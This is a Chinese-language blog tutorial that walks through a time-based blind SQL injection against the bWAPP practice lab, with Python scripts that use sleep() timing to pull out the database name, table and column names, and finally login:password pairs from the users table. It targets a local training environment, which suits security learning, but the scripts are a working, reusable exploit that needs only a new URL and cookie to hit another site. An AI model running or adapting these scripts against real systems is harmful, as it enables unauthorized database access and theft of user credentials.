使用python脚本的时间盲注完整步骤

文章目录

一、获取数据库名称长度

测试环境是bwapp靶场 SQL Injection - Blind - Time-Based

python 复制代码
import requests
import time

HEADER={
	"Cookie":"BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0"
}
BASE_URL="http://127.0.0.1:9004/sqli_15.php?"

def get_database_name_length(value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		#print(resp.content)
		if time.time()-start_time>1:
			print("数据库长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

databaselen = get_database_name_length("title", "&action=search") + 1

执行结果

tips:title=,&action=search需要使用burp抓包获得

--两边有空格

二、获取数据库名称

python 复制代码
def get_database_name(len, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER)
			if time.time()-start_time>2:
				print("{}:{}".format(i,j),chr(j))
				str+=(chr(j))
				break
	print("数据库名称为:",str)
	return str

执行语句:

database = get_database_name(databaselen,"title", "&action=search")

执行结果

三、获取表名总长度

python 复制代码
def get_table_name_length(database, value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1)) ={} and sleep(1) -- {}".format(value1, database,i, value2)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		if time.time()-start_time>1:
			print("表名总长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

tablelen = get_table_name_length(database,"title", "&action=search") + 1

执行结果:

四、获取表名

python 复制代码
def get_table_name(len,database, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i,j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER)
			if time.time()-start_time>2:
				#print("{}:{}".format(i,j),chr(j))
				str+=(chr(j))
				break
		print("{}:".format(i),str)
	print("表名为:",str)
	return str

执行语句:

get_table_name(tablelen,database,"title", "&action=search")

执行结果:

,

五、获取指定表列名总长度

python 复制代码
def get_column_name_length(database,table, value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1)) ={} and sleep(1) -- {}".format(value1, table,database,i, value1)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		if time.time()-start_time>1:
			print("列名总长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

columnlen = get_column_name_length(database, "users","title", "&action=search") + 1

执行结果:

六、获取指定表列名

python 复制代码
def get_column_name(len,database, table, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{},1))={} and sleep(2) -- {}".format(value1, table, database, i,j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER),
			if time.time()-start_time>2:
				str+=(chr(j))
				break
		print("{}:".format(i),str)
	print("列名为:",str)
	return str

执行语句:

get_column_name(columnlen, database, "users","title", "&action=search")

执行结果:

七、获取指定表指定列的表内数据总长度

python 复制代码
def get_data_name_length(table, username, password, value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1)) ={} and sleep(1) -- {}".format(value1, username, password, table,i, value2)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		if time.time()-start_time>1:
			print("列数据总长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

datalen = get_data_name_length("users", "login", "password","title", "&action=search") + 1

执行结果:

八、获取指定表指定列的表内数据

python 复制代码
def get_data_name(len, table, username, password, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i,j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER),
			if time.time()-start_time>2:
				str+=(chr(j))
				break
		print("{}:".format(i),str)
	print("登录数据为:",str)
	return str

执行语句:

get_data_name(datalen, "users", "login", "password","title", "&action=search")

执行结果:
我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名

相关推荐
JosieBook3 分钟前
【数据库】MySQL 实战精通系列 · 第11篇:Redis 缓存与 MySQL 一致性实战
数据库·mysql·缓存
茶栀(*´I`*)4 分钟前
【Python数据分析利器】Pandas从入门到实战:核心数据结构DataFrame与Series全解析
python·数据分析·pandas
码云数智-大飞6 分钟前
新手写 Python 代码,如何规范命名、减少 Bug
开发语言·python·php
天天被压力16 分钟前
【别再到处找免费股票数据API了:官方204个接口,32篇一次讲透 #06】Python实时行情总报错?五档盘口+逐笔一次跑通
java·人工智能·python
智能RPA16 分钟前
农业与矿业行业智能体自动化平台对比评测(计量与巡检场景)
运维·人工智能·python·自动化·agent·rpa
溪语流沙23 分钟前
Django + Vue电商项目第005讲:后端骨架|Django初始化、配置分层与DRF接入
vue.js·后端·python·django
代码方舟25 分钟前
Python数据工程:利用天远全能消金报告优化消费金融合规体验
人工智能·python
TomEval29 分钟前
【测AI】第05篇:Python 爬虫进阶 —— 动态页面爬取与 Scrapy 框架
人工智能·爬虫·python·scrapy·自动化
用户0190275816132 分钟前
如何用 Python 回测 MACD 金叉死叉策略?(真实收益与频繁交易的代价)
python
huisheng_qaq38 分钟前
【Python基础篇-07】深入理解python的面向对象编程
python·多态·继承·面向对象编程·封装